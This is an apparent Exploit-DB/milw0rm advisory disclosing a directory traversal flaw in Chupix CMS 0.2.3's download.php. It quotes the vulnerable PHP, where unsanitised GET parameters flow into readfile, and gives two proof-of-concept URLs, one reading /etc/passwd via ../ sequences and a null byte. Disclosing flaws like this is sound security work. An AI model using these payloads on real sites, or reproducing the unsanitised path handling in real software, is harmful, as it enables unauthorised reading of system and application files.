Chupix CMS 0.2.3 - 'download.php' Remote File Disclosure

EDB-ID:

4411


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2007-09-15


# Chupix CMS 0.2.3 (download.php) Remote File Download Vulnerability
# P.Script : http://sourceforge.net/project/showfiles.php?group_id=134930
################################download.php################################
Lain:18->57 ->
********************************************************************************************************************
if(isset($_GET['fichier'])){ <--------------XXXX                             
                                       *
		// téléchargement du fichier                                               
                         *
		$file = "archives/". $_GET['repertoire'] ."/". 
$_GET['fichier'];<--------------XXXX                *
		$fichier_txt = "archives/". $_GET['repertoire'] ."/cpt/". $_GET['fichier'] 
.".php"                 *
		$repertoire = "archives/". $_GET['repertoire'] ."/cpt/";                   
                         *
		if(is_file($fichier_txt)){                                                 
                         *
			$fp           =   @fopen($fichier_txt, "r");  <--------------XXXX         
                  *
			$result       =   fread($fp, filesize ($fichier_txt));                    
                  *
			fclose($fp);                                                              
                  *
			$result       =   str_replace("<?php ", "", $result);                     
                  *
			$result       =   str_replace("?>", "", $result);                         
                  *
		                                                                           
                         *
			$num = trim($result);                                                     
                  *
		}else{                                                                     
                         *
			$num = 0;                                                                 
                  *
		}                                                                          
                         *
		$num++;                                                                    
                         *
		                                                                           
                         *
		$msg = "<?php ". $num ." ?>";                                              
                         *
		                                                                           
                         *
		if(!(is_dir($repertoire))){                                                
                         *
			mkdir ($repertoire, 0755);                                                
                  *
		}                                                                          
                         *
		                                                                           
                         *
		$fp  =   @fopen($fichier_txt, "w+");<--------------XXXX                    
                         *
	  	if (flock($fp, LOCK_EX)) { // pose un verrou exclusif                    
                           *
    		fwrite($fp, $msg);                                                     
                             *
   			flock($fp, LOCK_UN); // libère le verrou                               
                     *
		}else{                                                                     
                         *
    		echo "Impossible de verrouiller le fichier <font color=\"maroon\">". 
$fichier ."</font>";          *
		}                                                                          
                         *
   	 	fclose($fp);                                                           
                             *
   	                               	                                         
                                   *                                         
                                                           *
   	 	                                                                       
                             *
		                                                                           
                         *
		header("Content-type: application/force-download");                        
                         *
		header("Content-Disposition: attachment; filename=".$_GET['fichier']);     
                         *
		readfile($file);<--------------XXXX                                        
                         *
}                                                                            
                                       *
********************************************************************************************************************
# POC:
      /download.php?repertoire=defaut&fichier=../../download.php
      /download.php?fichier=../../../../../../../etc/passwd%00
# Discovered by: GoLd_M
# SP.TanX = Tryag.Com & Asb-May.Net & Milw0rm.Com

# milw0rm.com [2007-09-15]